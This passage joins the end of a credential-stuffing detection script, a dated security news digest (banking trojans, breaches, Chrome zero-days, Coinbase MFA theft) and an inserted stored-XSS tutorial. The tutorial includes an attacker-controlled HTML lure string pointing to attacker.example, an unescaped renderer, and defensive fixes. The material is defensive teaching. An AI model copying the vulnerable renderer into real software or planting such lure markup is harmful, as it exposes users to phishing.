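    report = analyze(parse_log(SAMPLE_LOG))
    for ip in sorted(report["flagged_ips"]):
        s = report["per_ip"][ip]
        print(f"stuffing source {ip}: {len(s['users'])} accounts, "
              f"{s['failures']}/{s['attempts']} failures")
    print("accounts to lock:", sorted(report["accounts_to_lock"]))
```

In the constructed log, 203.0.113.10 tries ten different accounts with an 80% failure rate and is flagged, with erin and ivan as the accounts to lock; 198.51.100.7 is one user mistyping a password twice and is left alone. In production the same counts would be kept per sliding window and joined with ASN and user-agent data, since stuffing tooling rotates through proxy pools to stay under any single-IP threshold.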
October 1, 2021 – Attack
Hydra Android Trojan Campaign Targets Customers of Commerzbank and other European Banks Full Text
Abstract
Threat actors set up a page posing as the official Commerzbank page and registered multiple domains hosted on the same IP address. Crooks used the fake website to spread fake Commerzbank apps.Security Affairs
October 1, 2021 – Breach
Neiman Marcus discloses data breach, payment card data exposed Full Text
Abstract
Luxury retail company Neiman Marcus Group has announced this week that it has suffered a data breach that impacted customer information. The attack against Neiman Marcus Group took place in May 2020, as a result of the attack, threat actors had access...Security Affairs
October 01, 2021 – Business
Neiman Marcus sends notices of breach to 4.3 million customers Full Text
Abstract
Neiman Marcus, the Texas-based luxury department stores chain, is sending notices of a data breach to roughly 4.3 million customers.BleepingComputer
October 1, 2021 – Government
CISA Releases New Tool to Help Organizations Guard Against Insider Threats Full Text
Abstract
The CISA released an Insider Risk Mitigation Self-Assessment Tool today, which assists public and private sector organizations in assessing their vulnerability to an insider threat.US CERT
October 1, 2021 – Vulnerabilities
Google fixes 2 new actively exploited zero-day flaws in Chrome Full Text
Abstract
Google rolled out urgent security updates to address two new actively exploited zero-day vulnerabilities in its Chrome browser. Google this week rolled out urgent security updates for the Chrome browser to address four security flaws, including two new zero-day...Security Affairs
October 01, 2021 – Government
The FCC proposes rules to fight SIM swap and port-out fraud Full Text
Abstract
The Federal Communications Commission in the U.S. this week announced that it has started work on rules intended to put the brakes on SIM swapping attacks.BleepingComputer
October 01, 2021 – Cryptocurrency
Hackers rob thousands of Coinbase customers using MFA flaw Full Text
Abstract
Crypto exchange Coinbase disclosed that a threat actor stole cryptocurrency from 6,000 customers after using a vulnerability to bypass the company's SMS multi-factor authentication security feature.BleepingComputer
October 01, 2021 – Malware
Flubot Android malware now spreads via fake security updates Full Text
Abstract
The Flubot malware has switched to a new and likely more effective lure to compromise Android devices, now trying to trick its victims into infecting themselves with the help of fake security updates warning them of Flubot infections.BleepingComputer
October 01, 2021 – Malware
Hydra malware targets customers of Germany’s second largest bank Full Text
Abstract
The Hydra banking trojan is back to targeting European e-banking platform users, and more specifically, customers of Commerzbank, Germany's second-largest financial institution.BleepingComputer
October 1, 2021 – Government
Around the world with the NSA’s cyber chief Full Text
Abstract
“Almost every nation in the world now has a cyber exploitation program,” Rob Joyce, director of the NSA’s Cybersecurity Directorate, said during the Aspen Cyber Summit in Colorado.The Record
October 01, 2021 – Malware
Beware of Fake Amnesty International Antivirus for Pegasus that Hacks PCs with Malware Full Text
Abstract
In yet another indicator of how hacking groups are quick to capitalize on world events and improvise their attack campaigns for maximum impact, threat actors have been discovered impersonating Amnesty International to distribute malware that purports to be security software designed to safeguard against NSO Group's Pegasus surveillanceware. "Adversaries have set up a phony website that looks like Amnesty International's — a human rights-focused non-governmental organization — and points to a promised antivirus tool to protect against the NSO Group's Pegasus tool," Cisco Talos researchers said. "However, the download actually installs the little-known Sarwent malware." The countries most affected by the campaign include the U.K., the U.S., Russia, India, Ukraine, Czech Republic, Romania, and Colombia. While it's unclear as to how the victims are lured into visiting the fake Amnesty International website, the cybersecurity firm surmised the atta...The Hacker News
October 1, 2021 – Phishing
Weaponizing Apple AirTag to lure users to malicious sites Full Text
Abstract
Threat actors could exploit a stored cross-site scripting (XSS) vulnerability in Apple AirTag product to lure users to malicious websites. Security researcher Bobby Rauch discovered a stored cross-site scripting (XSS) vulnerability in the Apple AirTag...Security Affairs
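The AirTag item above names the bug class, stored XSS in a field an attacker controls, without showing the defect. The following is an added example and not Apple's code; how the real AirTag page renders its data is not described here, so the contact field, function names and the attacker string are assumptions chosen to illustrate the class. It puts the vulnerable rendering (attacker-stored text spliced into HTML unescaped) beside two fixes: output encoding at render time, and allowlist validation of the field at write time, since a contact phone number never legitimately contains markup.

```python
import html
import re

# Constructed attacker input (not a payload from the original report): a
# stored "contact" value that carries a link to a lure site instead of a number.
MALICIOUS_CONTACT = '<a href="https://attacker.example/login">Call owner</a>'
BENIGN_CONTACT = "+1 555 0100"

# Allowlist for a phone number: optional leading '+', then digits with the
# usual separators. Anything else (letters, '<', '"') is rejected outright.
PHONE_RE = re.compile(r"^\+?[0-9][0-9 ()\-]{4,19}$")


def render_contact_vulnerable(contact):
    """Stored XSS: whatever the attacker saved is emitted verbatim as HTML.

    A victim who opens the page gets the attacker's markup (here a link to a
    lure site) rendered as part of the trusted page.
    """
    return f"<p>Lost item. Contact: {contact}</p>"


def render_contact_safe(contact):
    """Output-encode at the point the value meets HTML.

    html.escape turns < > & into entities; quote=True also encodes ' and "
    so the same helper is safe if the value is ever placed in an attribute.
    """
    return f"<p>Lost item. Contact: {html.escape(contact, quote=True)}</p>"


def is_valid_phone(contact):
    """Second layer: validate the field against what a phone number looks like."""
    return PHONE_RE.fullmatch(contact) is not None


def store_contact(contact):
    """Reject non-phone-number input at write time; return the stored value.

    Validation alone is not sufficient (rules drift, other fields exist), so
    render_contact_safe is still applied on output even to validated data.
    """
    if not is_valid_phone(contact):
        raise ValueError("contact must be a phone number")
    return contact


if __name__ == "__main__":
    print("vulnerable:", render_contact_vulnerable(MALICIOUS_CONTACT))
    print("encoded:   ", render_contact_safe(MALICIOUS_CONTACT))
    try:
        store_contact(MALICIOUS_CONTACT)
    except ValueError as exc:
        print("rejected on write:", exc)
    print("stored:    ", render_contact_safe(store_contact(BENIGN_CONTACT)))
```

The two fixes are complementary: encoding at output protects every place the value is displayed regardless of how it got into storage, while the write-time allowlist keeps attacker markup out of the database in the first place, which also blocks the lure even in any client that renders the field without encoding.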
October 1, 2021 – Vulnerabilities
Report highlights cybersecurity dangers of Elastic Stack implementation mistakes Full Text
Abstract
Researchers from cybersecurity firm Salt Security discovered widespread mistakes that allowed them to launch attacks where any user could extract sensitive customer and system data.ZDNet
October 1, 2021 – Privacy
‘Stalkerware’ Apps Are Proliferating. Protect Yourself. Full Text
Abstract
While these apps numbered in the hundreds a few years ago, they have since grown into the thousands. They are widely available on Google’s Play Store and to a lesser degree on Apple’s App Store.New York Times